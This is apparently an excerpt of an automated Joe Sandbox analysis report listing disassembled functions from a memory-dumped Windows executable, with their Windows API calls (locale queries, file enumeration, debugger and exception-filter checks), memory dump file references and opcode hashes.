GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0096BE48
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0096BE67

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: a568b38b1c1d8d4404fed603ed01913df763d0783f53afef698676260794d117
Instruction ID: 14a3c2e0c4a99b4cccbde9e3c5f12c516f4447352e3704c5ff5beda0e78fcef2
Opcode Fuzzy Hash: a568b38b1c1d8d4404fed603ed01913df763d0783f53afef698676260794d117
Instruction Fuzzy Hash: 2C515CB2A00619ABDB20DFA5CC51BFA77BCBF44700F184469E954EB191FB709A80DB61

Function 009685E9 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 009686D9
FindNextFileW.KERNEL32(00000000,?), ref: 009687CD
FindClose.KERNEL32(00000000), ref: 0096880C
FindClose.KERNEL32(00000000), ref: 0096883F

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: ab7ca6360f894076f325a54e97b5b83332b26bc0cea5d584799a39f0808ad2cb
Instruction ID: cc9ea06a63830f87623ae52ee333d9b55b14928f34aff84e6bbd191a8677453b
Opcode Fuzzy Hash: ab7ca6360f894076f325a54e97b5b83332b26bc0cea5d584799a39f0808ad2cb
Instruction Fuzzy Hash: BE71D3B19051589FDF20EF24CC99BAFBBB9AF4A300F6442D9E04DA7211EE314E859F50

Function 00958DFE Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00958E0A
IsDebuggerPresent.KERNEL32 ref: 00958ED6
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00958EEF
UnhandledExceptionFilter.KERNEL32(?), ref: 00958EF9

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 745cea4cf4efabc50c022a9bc5433ed08f310293e8153273fd992b74f89ea7bd
Instruction ID: 364d042499e1159cc03fb60fad5498ba30a877a629e4b32ba985ab38859b9119
Opcode Fuzzy Hash: 745cea4cf4efabc50c022a9bc5433ed08f310293e8153273fd992b74f89ea7bd
Instruction Fuzzy Hash: 83310C75D05218DBDF20DF65D8497CDBBB8BF48305F10419AE80DA7250EB719A84DF45

Function 0096B74B Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00962E60: GetLastError.KERNEL32(?,00000008,0096345F,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 00962E64
Part of subcall function 00962E60: SetLastError.KERNEL32(00000000), ref: 00962F06

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0096B79F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0096B7E9
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0096B8AF

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 784a8c089200709813c52d829062179227df89926e31e748e7cef41a05760b33
Instruction ID: 0acd7a91db492f201ab74c17e6efd8112b48e2fe48c0e7e6b9425575dcd02b88
Opcode Fuzzy Hash: 784a8c089200709813c52d829062179227df89926e31e748e7cef41a05760b33
Instruction Fuzzy Hash: 14617B729442179FDB289F28CD82BAAB7ACEF54304F10417AEA05C7685FB38D9D1DB50

Function 0095CDE3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0095CEDB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0095CEE5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0095CEF2

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 76eff780166692c4b03e5339bc90d0987c63d1da54c4dccb8c7b8d336c5ff903
Instruction ID: 98f8a24c66752bc3f348a8d246fc9478fc3feb705ca001c067e062bd6416a6c8
Opcode Fuzzy Hash: 76eff780166692c4b03e5339bc90d0987c63d1da54c4dccb8c7b8d336c5ff903
Instruction Fuzzy Hash: 4631C4B5911218ABCB21DF65D88978DBBB8BF48311F5041DAE80DA7250EB709F85CF44

Function 009677CA Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,009677C5,?,?,?,?,?,?,00000000), ref: 009679F7

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 82d32ac1e9007d2d3bc5199f8bb280efbabc7c7f5e60fa7d5c143e61bf0079b2
Instruction ID: b4b97b5eba39ca24df6c23aa0f767d4611cf0ee9f5a9d1466a3a0a361da2e18c
Opcode Fuzzy Hash: 82d32ac1e9007d2d3bc5199f8bb280efbabc7c7f5e60fa7d5c143e61bf0079b2
Instruction Fuzzy Hash: 9EB14C31624609DFD715CF68C48AB69BBE0FF45368F258658E899CF2A1C335EE91CB40

Function 00958BF5 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00958C0B

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 79bc610eff78452eec9a6f763aedc2885af4ec457823dd1e36f4214368011e37
Instruction ID: 384a37ad9c6eda653dcda3cf19437fd0de3084733a069ce9978604bc715ca82a
Opcode Fuzzy Hash: 79bc610eff78452eec9a6f763aedc2885af4ec457823dd1e36f4214368011e37
Instruction Fuzzy Hash: 38519EB1A252058BDB18CF5AD8857BBB7F8FB48312F24846AC849FB290DB74D944CF50

Function 0096B99E Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00962E60: GetLastError.KERNEL32(?,00000008,0096345F,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 00962E64
Part of subcall function 00962E60: SetLastError.KERNEL32(00000000), ref: 00962F06

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0096B9F2

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 72c39925b97781c35e94217243f4de7dfe8b3b39ac7712c0045c18c583fb8349
Instruction ID: d317ac218849fa6d26b8a31a68d4fdd6a25431d4e4999e757f15cd4a0a2bb9f0
Opcode Fuzzy Hash: 72c39925b97781c35e94217243f4de7dfe8b3b39ac7712c0045c18c583fb8349
Instruction Fuzzy Hash: FA21BE72664206ABDB289F64DD42BBB73ECEF84300F10007AFD06C6141FB35AE818B50

Function 0096B625 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00962E60: GetLastError.KERNEL32(?,00000008,0096345F,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 00962E64
Part of subcall function 00962E60: SetLastError.KERNEL32(00000000), ref: 00962F06

EnumSystemLocalesW.KERNEL32(0096B74B,00000001,00000000,?,-00000050,?,0096BD7C,00000000,?,?,?,00000055,?), ref: 0096B697

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 973bbc47665a0fed82d13e90e77216c3702236479db3f027327bf39651d414fd
Instruction ID: cf398a15e81e0e0da518388d7a9659219c377b60c913d4287872f95b9f507c9a
Opcode Fuzzy Hash: 973bbc47665a0fed82d13e90e77216c3702236479db3f027327bf39651d414fd
Instruction Fuzzy Hash: C911C23B2047059FDB189F39C8A16BAB796FB80768B19442DE94687A40E771A982C750

Function 0096BBCD Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00962E60: GetLastError.KERNEL32(?,00000008,0096345F,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 00962E64
Part of subcall function 00962E60: SetLastError.KERNEL32(00000000), ref: 00962F06

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0096B967,00000000,00000000,?), ref: 0096BBF9

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: b423390c50eced51d2b9b5f6019ad4259b383c2de54872c27f395bdd1e49452d
Instruction ID: a0b82870ceadb4ca84c083ba01a1f8781763c8a902411878bdf8aaf68df3c1c0
Opcode Fuzzy Hash: b423390c50eced51d2b9b5f6019ad4259b383c2de54872c27f395bdd1e49452d
Instruction Fuzzy Hash: 44F0A433614119ABDB285B29C846BBB7768EB80754F550429ED86E3180FF78FE81C6E0

Function 0096B6C0 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00962E60: GetLastError.KERNEL32(?,00000008,0096345F,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 00962E64
Part of subcall function 00962E60: SetLastError.KERNEL32(00000000), ref: 00962F06

EnumSystemLocalesW.KERNEL32(0096B99E,00000001,00000000,?,-00000050,?,0096BD40,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0096B70A

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 32472cd5f7a31c6bfdd165870a54bcb203f0ee523f6fdf69135c154b53839a1c
Instruction ID: 784285088e6888466874bb4d19ec94b039afed87f260aff901580a6f2f360003
Opcode Fuzzy Hash: 32472cd5f7a31c6bfdd165870a54bcb203f0ee523f6fdf69135c154b53839a1c
Instruction Fuzzy Hash: AAF0C2362043085FDB245F35D881A7A7B95FBC0768F19442DFA45CBA80E7B1AC828660

Function 009636E5 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0095DBF8: EnterCriticalSection.KERNEL32(?,?,0096319F,?,00979C00,0000000C), ref: 0095DC07

EnumSystemLocalesW.KERNEL32(Function_000136D8,00000001,00979C20,0000000C,00963B07,?), ref: 0096371D

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 951bbb417af21a4f2e6fb3653e5bba2aad790d4544811bc127b83ec98416ecdc
Instruction ID: e38a148d4a696662355e90faa61fb71f4093fb96a0b10d1993ab7ca7f3634a70
Opcode Fuzzy Hash: 951bbb417af21a4f2e6fb3653e5bba2aad790d4544811bc127b83ec98416ecdc
Instruction Fuzzy Hash: B3F037B6A14204EFDB00DF98E842BAE77F0EB88722F10802AE8149B3A0DB755944DB50

Function 0096B5DA Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00962E60: GetLastError.KERNEL32(?,00000008,0096345F,?,?,00953CB9,009FA41C,?,?,009529CB,?,?,?,?,?,0095139A), ref: 00962E64
Part of subcall function 00962E60: SetLastError.KERNEL32(00000000), ref: 00962F06

EnumSystemLocalesW.KERNEL32(0096B533,00000001,00000000,?,?,0096BD9E,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0096B611

Memory Dump Source

Source File: 00000000.00000002.1832558573.0000000000951000.00000020.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1832534038.0000000000950000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832599610.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832624318.000000000097B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832685375.00000000009F8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832706458.00000000009F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832726530.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832778238.00000000009FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832802341.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832842313.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1832858390.0000000000A04000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_1hdqYXYJkr.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 4c29750e092a65f18c964b1b56d035c876622da1a62d45b7707591e62ac469c9
Instruction ID: bd43143c32b3b5ec0ee84785084e5f9693b00b9e6351ab2f905e62e9289ce23c
Opcode Fuzzy Hash: 4c29750e092a65f18c964b1b56d035c876622da1a62d45b7707591e62ac469c9
Instruction Fuzzy Hash: 1AF0E53670420957CB149F35D8457BABF98EFC1B64F4A4069FE0ACB250E7729882D7A0

Function 00963C0B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00962574,?,20001004,00000000,00000002,?,?,00961B76), ref: 00963C3F

Memory Dump Source

